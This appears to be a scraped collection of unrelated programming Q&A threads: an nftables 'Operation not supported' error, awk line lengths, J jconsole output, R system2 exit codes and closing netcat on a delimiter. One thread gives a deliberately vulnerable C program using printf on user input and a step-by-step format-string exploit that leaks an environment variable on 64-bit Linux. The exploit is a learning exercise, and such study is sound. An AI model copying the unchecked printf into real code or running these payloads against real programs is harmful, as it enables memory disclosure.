Request for your kind help related to nftables.
while using configuration commands. getting below error .
Error: Could not process rule: Operation not supported
Debian - 10.
root#localhost:~# uname -a
Linux localhost 4.19.81-OpenNetworkLinux-thanos #1 SMP Tue Apr 28 08:24:05 UTC 2020 x86_64 GNU/Linux
root#localhost:~# nft -v
nftables v0.9.0 (Fearless Fosdick)
Confirmed nft and dependent packages are installed.
root#localhost:~# sudo dpkg-query -l
...
ii libnftables0:amd64 0.9.0-2 amd64 Netfilter nftables high level userspace API library
ii libnftnl11:amd64 1.1.2-2 amd64 Netfilter nftables userspace API library
ii nftables 0.9.0-2 amd64 Program to control packet filtering rules by Netfilter project
ii libmnl0:amd64 1.0.4-2 amd64 minimalistic Netlink communication library
...
Tried below commands in order:
1.root#localhost:~# nft --debug all flush ruleset
2.root#localhost:~# nft --debug all add table ip filter
Below is the debug output for the above 2) add command
similar "operation unsupported" error was for 1) as well.
# nft --debug all add table ip filter
Entering state 0
Reducing stack by rule 1 (line 747):
-> $$ = nterm input (: )
Stack now 0
Entering state 1
Reading a token: --accepting rule at line 275 ("add")
Next token is token "add" (: )
Shifting token "add" (: )
Entering state 19
Reading a token: --accepting rule at line 631 (" ")
--accepting rule at line 245 ("table")
Next token is token "table" (: )
Shifting token "table" (: )
Entering state 10
Reading a token: --accepting rule at line 631 (" ")
--accepting rule at line 388 ("ip")
Next token is token "ip" (: )
Shifting token "ip" (: )
Entering state 35
Reducing stack by rule 246 (line 1845):
$1 = token "ip" (: )
-> $$ = nterm family_spec_explicit (: )
Stack now 0 1 19 10
Entering state 47
Reducing stack by rule 245 (line 1842):
$1 = nterm family_spec_explicit (: )
-> $$ = nterm family_spec (: )
Reducing stack by rule 245 (line 1842):
$1 = nterm family_spec_explicit (: )
-> $$ = nterm family_spec (: )
Stack now 0 1 19 10
Entering state 46
Reading a token: --accepting rule at line 631 (" ")
--accepting rule at line 602 ("filter")
Next token is token "string" (: )
Shifting token "string" (: )
Entering state 53
Reducing stack by rule 239 (line 1818):
$1 = token "string" (: )
-> $$ = nterm identifier (: )
Stack now 0 1 19 10 46
Entering state 250
Reducing stack by rule 252 (line 1853):
$1 = nterm family_spec (: )
$2 = nterm identifier (: )
-> $$ = nterm table_spec (: )
Stack now 0 1 19 10
Entering state 57
Reading a token: --accepting rule at line 611 ("
")
Next token is token "newline" (: )
Reducing stack by rule 31 (line 874):
$1 = token "table" (: )
$2 = nterm table_spec (: )
-> $$ = nterm add_cmd (: )
Stack now 0 1 19
Entering state 66
Reducing stack by rule 17 (line 858):
$1 = token "add" (: )
$2 = nterm add_cmd (: )
-> $$ = nterm base_cmd (: )
Stack now 0 1
Entering state 44
Next token is token "newline" (: )
Shifting token "newline" (: )
Entering state 4
Reducing stack by rule 3 (line 766):
$1 = token "newline" (: )
-> $$ = nterm stmt_separator (: )
Stack now 0 1 44
Entering state 249
Reducing stack by rule 14 (line 824):
$1 = nterm base_cmd (: )
$2 = nterm stmt_separator (: )
-> $$ = nterm line (: )
Stack now 0 1
Entering state 43
Reducing stack by rule 2 (line 748):
$1 = nterm input (: )
$2 = nterm line (: )
Evaluate add
add table ip filter
^^^^^^^^^^^^^^^^^^^^
-> $$ = nterm input (: )
Stack now 0
Entering state 1
Reading a token: --(end of buffer or a NUL)
--EOF (start condition 0)
Now at end of input.
Shifting token "end of file" (: )
Entering state 2
Stack now 0 1 2
Cleanup: popping token "end of file" (: )
Cleanup: popping nterm input (: )
---------------- ------------------
| 0000000020 | | message length |
| 00016 | R--- | | type | flags |
| 0000000000 | | sequence number|
| 0000000000 | | port ID |
---------------- ------------------
| 00 00 0a 00 | | extra header |"
.....
Error: Could not process rule: Operation not supported
add table ip filter
^^^^^^^^^^^^^^
root#localhost:~# nft --interactive
nft> create table inet mytable
Error: Could not process rule: Operation not supported
create table inet mytable
Appreciate your help.
Thanks all,
Santosh
It is possible that the kernel was compiled without the nftables module.
You can check if the module is loaded by:
lsmod | grep nf_tables
Related
I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.
Hi Wonderful People/My Gurus and all kind-hearted people.
I've a fixed width file and currently i'm trying to find the length of those rows that contain x bytes. I tried couple of awk commands but, it is not giving me the result that i wanted. My fixed width contains 208bytes, but there are few rows that don't contain 208 bytes. I"m trying to discover those records that doesn't have 208bytes.
this cmd gave me the file length
awk '{print length;exit}' file.text
here i tried to print rows that contain 101 bytes, but it didn't work.
awk '{print length==101}' file.text
Any help/insights here would be highly helpful
With awk:
awk 'length() < 208' file
Well, length() gives you the number of characters, not bytes. This number can differ in unicode context. You can use the LANG environment variable to force awk to use bytes:
LANG=C awk 'length() < 208' file
Perl to the rescue!
perl -lne 'print "$.:", length if length != 208' -- file.text
-n reads the input line by line
-l removes newlines from the input before processing it and adds them to print
The one-liner will print line number ($.) and the length of the line for each line whose length is different than 208.
if you're using gawk, then it's no issue, even in typical UTF-8 locale mode :
length(s) = # chars native to locale,
# typically that means # utf-8 chars
match(s, /$/) - 1 = # raw bytes # this also work for pure-binary
# inputs, without triggering
# any error messages in gawk Unicode mode
Best illustrated by example :
0000000 3347498554 3381184647 3182945161 171608122
: Ɔ ** LJ ** Ȉ ** ɉ ** 㷽 ** ** : 210 : \n
072 306 206 307 207 310 210 311 211 343 267 275 072 210 072 012
: ? 86 ? 87 ? 88 ? 89 ? ? ? : 88 : nl
58 198 134 199 135 200 136 201 137 227 183 189 58 136 58 10
3a c6 86 c7 87 c8 88 c9 89 e3 b7 bd 3a 88 3a 0a
0000020
# gawk profile, created Sat Oct 29 20:32:49 2022
BEGIN {
1 __ = "\306\206\307\207\310" (_="\210") \
"\311\211\343\267\275"
1 print "",__,_
1 STDERR = "/dev/stderr"
1 print ( match(_, /$/) - 1, "_" ) > STDERR # *A
1 print ( length(__), match(__, /$/) - 1 ) > STDERR # *B
1 print ( (__~_), match(__, (_) ".*") ) > STDERR # *C
1 print ( RSTART, RLENGTH ) > STDERR # *D
}
1 | _ *A # of bytes off "_" because it was defined as 0x88 \210
5 | 11 *B # of chars of "__", and
# of bytes of it :
# 4 x 2-byte UC
# + 1 x 3-byte UC = 11
1 | 3 *C # does byte \210 exist among larger string (true/1),
# and which unicode character is 1st to
# contain \210 - the 3rd one, by original definition
3 | 3 *D # notice I also added a ".*" to the tail of this match() :
# if the left-side string being tested is valid UTF-8,
# then this will match all the way to the end of string,
# inclusive, in which you can deduce :
#
# "\210 first appeared in 3rd-to-last utf-8 character"
Combining that inferred understanding :
RLENGTH = "3 chars to the end, inclusive",
with knowledge of how many to its left :
RSTART - 1 = "2 chars before",
yields a total count of 3 + 2 = 5, affirming length()'s result
I've recently started to learn J.
If find it useful when learning a new language to be able to quickly
map a bit of source code to an output and store it for later reference in Emacs org-mode.
But I'm having trouble with the cryptic jconsole when I want to do the evaluation.
For instance jconsole --help doesn't work.
And man jconsole brings up something about a Java tool. Same applies to googling.
I have for instance this bit of code from the tutorial saved in temp.ijs:
m =. i. 3 4
1 { m
23 23 23 23 (1}) m
Now when I run jconsole < temp.ijs, the output is:
4 5 6 7
0 1 2 3
23 23 23 23
8 9 10 11
Ideally, I'd like the output to be:
4 5 6 7
0 1 2 3
23 23 23 23
8 9 10 11
Again, ideally I'd like to have this without changing the source code at all,
i.e. just by passing some flag to jconsole.
Is there a way to do this?
I'm currently going with solving the problem on Emacs side, instead of on jconsole side.
I intersperse the source code with echo'':
(defun org-babel-expand-body:J (body params)
"Expand BODY according to PARAMS, return the expanded body."
(mapconcat #'identity (split-string body "\n") "\necho''\n"))
Execute it like this:
(j-strip-whitespace
(org-babel-eval
(format "jconsole < %s" tmp-script-file) ""))
And post-process assuming that only first row of each array is misaligned
(that has been my experience so far). Here's the result:
#+begin_src J
m =. i. 3 4
1 { m
23 23 23 23 (1}) m
#+end_src
#+RESULTS:
: 4 5 6 7
:
: 0 1 2 3
: 23 23 23 23
: 8 9 10 11
And here's the post-processing code:
(defun whitespacep (str)
(string-match "^ *$" str))
(defun match-second-space (s)
(and (string-match "^ *[^ ]+\\( \\)" s)
(match-beginning 1)))
(defun strip-leading-ws (s)
(and (string-match "^ *\\([^ ].*\\)" s)
(match-string 1 s)))
(defun j-print-block (x)
(if (= 1 (length x))
(strip-leading-ws (car x))
;; assume only first row misaligned
(let ((n1 (match-second-space (car x)))
(n2 (match-second-space (cadr x))))
(setcar
x
(if (and n1 n2)
(substring (car x) (- n1 n2))
(strip-leading-ws (car x))))
(mapconcat #'identity x "\n"))))
(defun j-strip-whitespace (str)
(let ((strs (split-string str "\n" t))
out cur s)
(while (setq s (pop strs))
(if (whitespacep s)
(progn (push (nreverse cur) out)
(setq cur))
(push s cur)))
(mapconcat #'j-print-block
(delq nil (nreverse out))
"\n\n")))
You need to use echo for explicit output, rather than rely on implicit output which is the case for the REPL function of jconsole normally.
Create the script, which I'm calling "tst2.js" below, and place the following code in it:
#!/Applications/j64/bin/jconsole
9!:7'+++++++++|-'
m =. i. 3 4
echo 1 { m
echo ''
echo 23 23 23 23 (1}) m
exit''
Of course, if your path to jconsole is different, then update the "shebang" line to be the actual path for your system.
Next, make sure the script is executable:
$ chmod +x tst2.js
or whatever you called your script.
Next, invoke it:
$ ./tst2.js
4 5 6 7
0 1 2 3
23 23 23 23
8 9 10 11
Note that the above output is identical to the output generated when you are in the interactive jconsole.
The problem is with loose declarations. Every time you give the console a command, it replies with the answer. You should format your code in a verb and have it echo what you need.
foo =: 3 : 0
m =. i. 3 4
echo ''
echo 1 { m
echo ''
echo 23 23 23 23 (1}) m
''
)
foo''
It can also be nameless and self executing if you're in a hurry:
3 : 0 ''
m =. i. 3 4
echo ''
echo 1 { m
echo ''
echo 23 23 23 23 (1}) m
''
)
I've been playing a bit with system() and system2() for fun, and it struck me that I can save either the output or the exit status in an object. A toy example:
X <- system("ping google.com",intern=TRUE)
gives me the output, whereas
X <- system2("ping", "google.com")
gives me the exit status (1 in this case, google doesn't take ping). If I want both the output and the exit status, I have to do 2 system calls, which seems a bit overkill. How can I get both with using only one system call?
EDIT : I'd like to have both in the console, if possible without going over a temporary file by using stdout="somefile.ext" in the system2 call and subsequently reading it in.
As of R 2.15, system2 will give the return value as an attribute when stdout and/or stderr are TRUE. This makes it easy to get the text output and return value.
In this example, ret ends up being a string with an attribute "status":
> ret <- system2("ls","xx", stdout=TRUE, stderr=TRUE)
Warning message:
running command ''ls' xx 2>&1' had status 1
> ret
[1] "ls: xx: No such file or directory"
attr(,"status")
[1] 1
> attr(ret, "status")
[1] 1
I am a bit confused by your description of system2, because it has stdout and stderr arguments. So it is able to return both exit status, stdout and stderr.
> out <- tryCatch(ex <- system2("ls","xx", stdout=TRUE, stderr=TRUE), warning=function(w){w})
> out
<simpleWarning: running command ''ls' xx 2>&1' had status 2>
> ex
[1] "ls: cannot access xx: No such file or directory"
> out <- tryCatch(ex <- system2("ls","-l", stdout=TRUE, stderr=TRUE), warning=function(w){w})
> out
[listing snipped]
> ex
[listing snipped]
I suggest using this function here:
robust.system <- function (cmd) {
stderrFile = tempfile(pattern="R_robust.system_stderr", fileext=as.character(Sys.getpid()))
stdoutFile = tempfile(pattern="R_robust.system_stdout", fileext=as.character(Sys.getpid()))
retval = list()
retval$exitStatus = system(paste0(cmd, " 2> ", shQuote(stderrFile), " > ", shQuote(stdoutFile)))
retval$stdout = readLines(stdoutFile)
retval$stderr = readLines(stderrFile)
unlink(c(stdoutFile, stderrFile))
return(retval)
}
This will only work on a Unix-like shell that accepts > and 2> notations, and the cmd argument should not redirect output itself. But it does the trick:
> robust.system("ls -la")
$exitStatus
[1] 0
$stdout
[1] "total 160"
[2] "drwxr-xr-x 14 asieira staff 476 10 Jun 18:18 ."
[3] "drwxr-xr-x 12 asieira staff 408 9 Jun 20:13 .."
[4] "-rw-r--r-- 1 asieira staff 6736 5 Jun 19:32 .Rapp.history"
[5] "-rw-r--r-- 1 asieira staff 19109 11 Jun 20:44 .Rhistory"
$stderr
character(0)
We have a very simple tcp messaging script that cats some text to a server port which returns and displays a response.
The part of the script we care about looks something like this:
cat someFile | netcat somehost 1234
The response the server returns is 'complete' once we get a certain character code (specifically &001C) returned.
How can I close the connection when I receive this special character?
(Note: The server won't close the connection for me. While I currently just CTRL+C the script when I can tell it's done, I wish to be able to send many of these messages, one after the other.)
(Note: netcat -w x isn't good enough because I wish to push these messages through as fast as possible)
Create a bash script called client.sh:
#!/bin/bash
cat someFile
while read FOO; do
echo $FOO >&3
if [[ $FOO =~ `printf ".*\x00\x1c.*"` ]]; then
break
fi
done
Then invoke netcat from your main script like so:
3>&1 nc -c ./client.sh somehost 1234
(You'll need bash version 3 for the regexp matching).
This assumes that the server is sending data in lines - if not you'll have to tweak client.sh so that it reads and echoes a character at a time.
How about this?
Client side:
awk -v RS=$'\x1c' 'NR==1;{exit 0;}' < /dev/tcp/host-ip/port
Testing:
# server side test script
while true; do ascii -hd; done | { netcat -l 12345; echo closed...;}
# Generate 'some' data for testing & pipe to netcat.
# After netcat connection closes, echo will print 'closed...'
# Client side:
awk -v RS=J 'NR==1; {exit;}' < /dev/tcp/localhost/12345
# Changed end character to 'J' for testing.
# Didn't wish to write a server side script to generate 0x1C.
Client side produces:
0 NUL 16 DLE 32 48 0 64 # 80 P 96 ` 112 p
1 SOH 17 DC1 33 ! 49 1 65 A 81 Q 97 a 113 q
2 STX 18 DC2 34 " 50 2 66 B 82 R 98 b 114 r
3 ETX 19 DC3 35 # 51 3 67 C 83 S 99 c 115 s
4 EOT 20 DC4 36 $ 52 4 68 D 84 T 100 d 116 t
5 ENQ 21 NAK 37 % 53 5 69 E 85 U 101 e 117 u
6 ACK 22 SYN 38 & 54 6 70 F 86 V 102 f 118 v
7 BEL 23 ETB 39 ' 55 7 71 G 87 W 103 g 119 w
8 BS 24 CAN 40 ( 56 8 72 H 88 X 104 h 120 x
9 HT 25 EM 41 ) 57 9 73 I 89 Y 105 i 121 y
10 LF 26 SUB 42 * 58 : 74
After 'J' appears, server side closes & prints 'closed...', ensuring that the connection has indeed closed.
Try:
(cat somefile; sleep $timeout) | nc somehost 1234 | sed -e '{s/\x01.*//;T skip;q;:skip}'
This requires GNU sed.
How it works:
{
s/\x01.*//; # search for \x01, if we find it, kill it and the rest of the line
T skip; # goto label skip if the last s/// failed
q; # quit, printing current pattern buffer
:skip # label skip
}
Note that this assumes there'll be a newline after \x01 - sed won't see it otherwise, as sed operates line-by-line.
Maybe have a look at Ncat as well:
"Ncat is the culmination of many key features from various Netcat incarnations such as Netcat 1.x, Netcat6, SOcat, Cryptcat, GNU Netcat, etc. Ncat has a host of new features such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server supprt, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support, IP address/connection filtering, plus much more."
http://nmap-ncat.sourceforge.net
This worked best for me. Just read the output with a while loop and then check for "0x1c" using an if statement.
while read i; do
if [ "$i" = "0x1c" ] ; then # Read until "0x1c". Then exit
break
fi
echo $i;
done < <(cat someFile | netcat somehost 1234)